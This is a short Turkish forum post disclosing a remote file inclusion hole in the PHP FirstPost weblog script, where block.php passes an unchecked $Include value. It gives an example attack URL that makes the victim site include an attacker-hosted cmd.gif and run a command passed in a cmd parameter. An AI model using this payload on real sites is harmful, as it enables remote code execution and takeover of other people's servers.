PHP FirstPost Açığı

deltanyum

Banned
Katılım
9 Tem 2005
Mesajlar
219
Reaction score
0
Puanları
0
PHP FirstPost scoop tabanlı bir Weblog scripti.Bulunan açıkla dışardan bir kullanıcının herhangi bir php komutu include etmesi sağlanıyor.

"block.php" scripti tam olarak tanımlama yapamadığından dışardan bir kullanıcı $Include değerini kullanarak siteye istediği komutu girdirebilir.

Örnek Kod:

QUOTE:
http://kurban/path_to_script/block.php?Include=http://[sizinsiteniz]/cmd.gif?&cmd=|command|
 
Geri
Üst